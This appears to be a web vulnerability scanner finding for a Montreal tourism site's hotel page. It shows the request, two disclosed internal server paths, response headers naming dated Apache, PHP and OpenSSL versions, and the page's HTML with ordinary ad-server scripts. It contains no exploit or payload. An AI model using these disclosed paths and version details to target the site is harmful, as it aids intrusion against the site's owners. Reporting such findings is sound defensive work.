href="/quebec-hotels/shawinigan_quebec_canada_hotels.php" class="tourism">Shawinigan Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/sherbrooke_quebec_canada_hotels.php" class="tourism">Sherbrooke Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/st-sauveur_quebec_canada_hotels.php" class="tourism">St-Sauveur Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/trois_rivieres_quebec_canada_hotels.php" class="tourism">Trois Rivieres Hotels</a> </td> </tr> </table>&nbsp;<table width="187" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td colspan="2"><img src="/img/spc.gif" width="100" height="2"></td> </tr> <tr bgcolor="#333333"> <td width="170" height="92" align="center" valign="middle"><script language='JavaScript' type='text/javascript' src='http://www.uberip.com/adserver/adx.js'></script><script language='JavaScript' type='text/javascript'><!-- if (!document.phpAds_used) document.phpAds_used = ','; phpAds_random = new String (Math.random()); phpAds_random = phpAds_random.substring(2,11); document.write ("<" + "script language='JavaScript' type='text/javascript' src='"); document.write ("http://www.uberip.com/adserver/adjs.php?n=" + phpAds_random); document.write ("&amp;what=zone:37&amp;blockcampaign=1"); document.write ("&amp;exclude=" + document.phpAds_used); if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer)); document.write ("'><" + "/script>");//--></script><noscript><a href='http://www.uberip.com/adserver/adclick.php?n=a249a9c2' target='_blank'><img src='http://www.uberip.com/adserver/adview.php?what=zone:37&amp;n=a249a9c2' border='0' alt=''></a></noscript></td> <td width="17"><a href="/advertising-rate-card.php"><img src="/img/banners/advertising.gif" alt="Montreal Advertising" width="17" height="92" border="0"></a></td> </tr> <tr> <td colspan="2"><img src="/img/spc.gif" width="100" height="3"></td> </tr> </table> &nbsp; <table width="187" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td colspan="2"><img src="/img/spc.gif" width="100" height="2"></td> </tr> <tr bgcolor="#333333"> <td width="170" height="92" align="center" valign="middle"><script language='JavaScript' type='text/javascript' src='http://www.uberip.com/adserver/adx.js'></script><script language='JavaScript' type='text/javascript'><!-- if (!document.phpAds_used) document.phpAds_used = ','; phpAds_random = new String (Math.random()); phpAds_random = phpAds_random.substring(2,11); document.write ("<" + "script language='JavaScript' type='text/javascript' src='"); document.write ("http://www.uberip.com/adserver/adjs.php?n=" + phpAds_random); document.write ("&amp;what=zone:37&amp;blockcampaign=1"); document.write ("&amp;exclude=" + document.phpAds_used); if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer)); document.write ("'..
- /quebec-hotels/holiday_inn_montreal/longueuil,_qc_longueuil.php

/quebec-hotels/holiday_inn_montreal/longueuil,_qc_longueuil.php

http://www.montrealkiosk.com/quebec-hotels/holiday_inn_montreal/longueuil,_qc_longueuil.php

Identified Internal Path(s)

  • /home/montreak/public_html/content_includes/footer.php
  • /home/montreak/public_html/

Request

GET /quebec-hotels/holiday_inn_montreal/longueuil,_qc_longueuil.php HTTP/1.1
Referer: http://www.montrealkiosk.com/quebec-hotels/all_longueuil_hotels.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:25:31 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Holiday Inn Montreal/Longueuil, Qc - Longueuil Hotels - Holiday Inn Montreal/Longueuil, Qc - Longueuil Hotels and Accommodations Guide</title><meta name="keywords" content="Longueuil hotel, Longueuil hotels, Longueuil, Quebec, Quebec hotels"><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><script type="text/javascript" src="/javascript.js"></script><script type="text/javascript" src="/show.js"></script><link href="/main.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="http://www.canoe.com/generix/js/generix.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/js/GenFonction.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/external/www.canadiantourismnetwork.com/TagDfpSection.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/external/www.canadiantourismnetwork.com/quebec/TagDfpConfig.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/TagDfpEngine.js"></script></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="MM_preloadImages('/img/bhome-on.gif','/img/bsitemap-on.gif','/img/bcontact-on.gif','/img/bbookmark-on.gif','/img/binfo-on.gif','/img/btour-on.gif','/img/bevents-on.gif','/img/bhotel-on.gif','/img/babout-on.gif');runSlideShow()"><table width="747" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td colspan="2"><img src="/img/spc.gif" width="200" height="2"></td> </tr> <tr bgcolor="#333333"> <td width="730" height="92" align="center" valign="middle"><script language='JavaScript' type='text/javascript' src='http://www.uberip.com/adserver/adx.js'></script><script language='JavaScript' type='text/javascript'><!-- if (!document.phpAds_used) document.phpAds_used = ','; phpAds_random = new String (Math.random()); phpAds_random = phpAds_random.substring(2,11); document.write ("<" + "script language='JavaScript' type='text/javascript' src='"); document.write ("http://www.uberip.com/adserver/adjs.php?n=" + phpAds_random); document.write ("&amp;what=zone:4"); document.write ("&amp;exclude=" + document.phpAds_used); if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer)); document.write ("'><" + "/script>");//--></script><noscript><a href='http://www.uberip.com/adserver/adclick.php?n=aae0fd6b' target='_blank'><img src='http://www.uberip.com/adserver/adview.php?what=zone:4&amp;n=aae0fd6b' border='0' alt=''></a></noscript></td> <td width="17"><a href="/advertising-rate-card.php"><img src="/img/banners/advertising.gif" alt="Montreal Advertising" width="17" height="92" border="0"></a></td> </tr> <tr> <td colspan="2"><img src="/img/spc.gif" width="200" height="3"></td> </tr></table><table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="top"> <td height="298" background="/img/bg-menu.jpg" width="1600">&nbsp;</td> <td colspan="5" background="/img/bg-menu.jpg"><table width="1000" border="0" cellspacing="0" cellpadding="0"> <tr> <td colspan="4"><table width="1000" border="0" cellspacing="0" cellpadding="0"> <tr valign="top"> <td width="551"><a href="/index.php"><img src="/img/montreal.gif" alt="Montreal Kiosk - Your Guide to Montreal, Quebec. Book Montreal Hotel accommodations here... read up on our Montreal Tour Guide and Montreal events." width="551" height="90" border="0"></a></td> <td><a href="/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image2','','/img/bhome-on.gif',1)"><img src="/img/bhome.gif" alt="Montreal, Quebec" name="Image2" width="41" height="30" border="0"></a><a href="/sitemap.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image3','','/img/bsitemap-on.gif',1)"><img src="/img/bsitemap.gif" alt="Site Map" name="Image3" width="55" height="30" border="0"></a><a href="/contact.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image4','','/img/bcontact-on.gif',1)"><img src="/img/bcontact.gif" alt="Montreal Kiosk Contact Info" name="Image4" width="74" height="30" border="0"></a><a href="javascript:addBookmark('Montreal Kiosk - Your Guide to Montreal, Quebec','http://www.montrealkiosk.com')" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image5','','/img/bbookmark-on.gif',1)"><img src="/img/bbookmark.gif" alt="Bookmark Montreal Kiosk" name="Image5" width="96" height="30" border="0"></a></td> </tr> </table></td> </tr> <tr> <td width="120"><img src="/img/menupic1.jpg" width="120" height="208"></td> <td width="204" valign="top"><table width="204" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="204" height="29"><a href="/index.php#directory" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image7','','/img/binfo-on.gif',1)"><img src="/img/binfo.gif" alt="Montreal Business Directory" name="Image7" width="204" height="30" border="0"></a><a href="/montreal-tour/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image10','','/img/btour-on.gif',1)"><img src="/img/btour.gif" alt="Montreal Tour Guide" name="Image10" width="204" height="29" border="0"></a><a href="/montreal-events/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image11','','/img/bevents-on.gif',1)"><img src="/img/bevents.gif" alt="Montreal Events" name="Image11" width="204" height="29" border="0"></a><a href="/quebec-hotels/montreal_quebec_canada_hotels.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image12','','/img/bhotel-on.gif',1)"><img src="/img/bhotel.gif" alt="Montreal Hotels" name="Image12" width="204" height="29" border="0"></a><a href="/about.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image13','','/img/babout-on.gif',1)"><img src="/img/babout.gif" alt="About Montreal Kiosk" name="Image13" width="204" height="29" border="0"></a></td> </tr> <tr> <form name="form1" method="post" action=""> <td height="52"> <table width="204" height="52" border="0" cellpadding="0" cellspacing="0" background="/img/buttonfiller.gif"> <tr> <td width="31">&nbsp;</td> <td width="173" height="29"><!-- #BeginLibraryItem "/Library/quicklinks.lbi" --><select name="montreal" class="smalltext" OnChange="location.href=form1.montreal.options[selectedIndex].value"> <option selected>Quick Links <option value="http://www.montrealkiosk.com/montreal-tour/index.php">Montreal Attractions <option value="http://www.montrealkiosk.com/maps/index.php">Map of Montreal <option value="http://www.montrealkiosk.com/weather.php">Montreal Weather <option value="http://www.montrealkiosk.com/quebec-hotels/montreal_quebec_canada_hotels.php">Montreal Hotels <option value="http://www.montrealkiosk.com/advertising.php">Advertising Information <option value="http://www.montrealkiosk.com/contact.php">Contact Us</select><!-- #EndLibraryItem --></td> </tr> <tr> <td height="33" colspan="2" background="/img/bg-button.gif">&nbsp;</td> </tr> </table> </td> </form> </tr> </table></td> <td width="493"><img src="/img/menupic2.jpg" alt="Montreal, Quebec - A City Full of Life and Culture" name="SlideShow" width="493" height="208" id="SlideShow"></td> <td><img src="/img/menupic3.jpg" width="183" height="208"></td> </tr> </table></td> <td background="/img/bg-menu.jpg" width="1600">&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td width="127" rowspan="3" valign="top" background="/img/bg-left.gif"><img src="/img/bg-left.gif" width="127" height="36"></td> <td width="187" rowspan="2" valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><img src="/img/titlearrow.gif" width="22" height="22"></td> <td><img src="/img/spc.gif" width="4" height="10"></td> <td><NOBR class="maintitle">Quebec Hotels</NOBR></td> <td><img src="/img/spc.gif" width="8" height="10"></td> <td width="1600" bgcolor="#CCCCCC">&nbsp;</td> </tr> <tr> <td colspan="5"><img src="/img/spc.gif" width="100" height="3"></td> </tr> </table> <table width="100%" border="0" cellspacing="3" cellpadding="3"> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/blainville_quebec_canada_hotels.php" class="tourism">Blainville Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/boucherville_quebec_canada_hotels.php" class="tourism">Boucherville Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/dorval_quebec_canada_hotels.php" class="tourism">Dorval Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/laval_quebec_canada_hotels.php" class="tourism">Laval Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/longueuil_quebec_canada_hotels.php" class="tourism">Longueuil Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/montreal_quebec_canada_hotels.php" class="tourism">Montreal Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/pointe_claire_quebec_canada_hotels.php" class="tourism">Pointe Claire Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/saint_jean_sur_richelieu_quebec_canada_hotels.php" class="tourism">Saint Jean Sur Richelieu Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/sainte_adele_quebec_canada_hotels.php" class="tourism">Sainte Adele Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/shawinigan_quebec_canada_hotels.php" class="tourism">Shawinigan Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/sherbrooke_quebec_canada_hotels.php" class="tourism">Sherbrooke Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/st-sauveur_quebec_canada_hotels.php" class="tourism">St-Sauveur Hotels</a> </td> </tr> <tr> <td><img src="/img/arrow.gif" width="10" height="10" hspace="3"> <a href="/quebec-hotels/trois_rivieres_quebec_canada_hotels.php" class="tourism">Trois Rivieres Hotels</a> </td> </tr> </table>&nbsp;<table width="187" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td colspan="2"><img src="/img/spc.gif" width="100" height="2"></td> </tr> <tr bgcolor="#333333"> <td width="170" height="92" align="center" valign="middle"><script language='JavaScript' type='text/javascript' src='http://www.uberip.com/adserver/adx.js'></script><script language='JavaScript' type='text/javascript'><!-- if (!document.phpAds_used) document.phpAds_used = ','; phpAds_random = new String (Math.random()); phpAds_random = phpAds_random.substring(2,11); document.write ("<" + "script language='JavaScript' type='text/javascript' src='"); document.write ("http://www.uberip.com/adserver/adjs.php?n=" + phpAds_random); document.write ("&amp;what=zone:37&amp;blockcampaign=1"); document.write ("&amp;exclude=" + document.phpAds_used); if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer)); document.write ("'><" + "/script>");//--></script><noscript><a href='http://www.uberip.com/adserver/adclick.php?n=a249a9c2' target='_blank'><img src='http://www.uberip.com/adserver/adview.php?what=zone:37&amp;n=a249a9c2' border='0' alt=''></a></noscript></td> <td width="17"><a href="/advertising-rate-card.php"><img src="/img/banners/advertising.gif" alt="Montreal Advertising" width="17" height="92" border="0"></a></td> </tr> <tr> <td colspan="2"><img src="/img/spc.gif" width="100" height="3"></td> </tr> </table> &nbsp; <table width="187" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td colspan="2"><img src="/img/spc.gif" width="100" height="2"></td> </tr> <tr bgcolor="#333333"> <td width="170" height="92" align="center" valign="middle"><script language='JavaScript' type='text/javascript' src='http://www.uberip.com/adserver/adx.js'></script><script language='JavaScript' type='text/javascript'><!-- if (!document.phpAds_used) document.phpAds_used = ','; phpAds_random = new String (Math.random()); phpAds_random = phpAds_random.substring(2,11); document.write ("<" + "script language='JavaScript' type='text/javascript' src='"); document.write ("http://www.uberip.com/adserver/adjs.php?n=" + phpAds_random); document.write ("&amp;what=zone:37&amp;blockcampaign=1"); document.write ("&amp;exclude=" + document.phpAds_used); if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer)); document.write ("'><" ..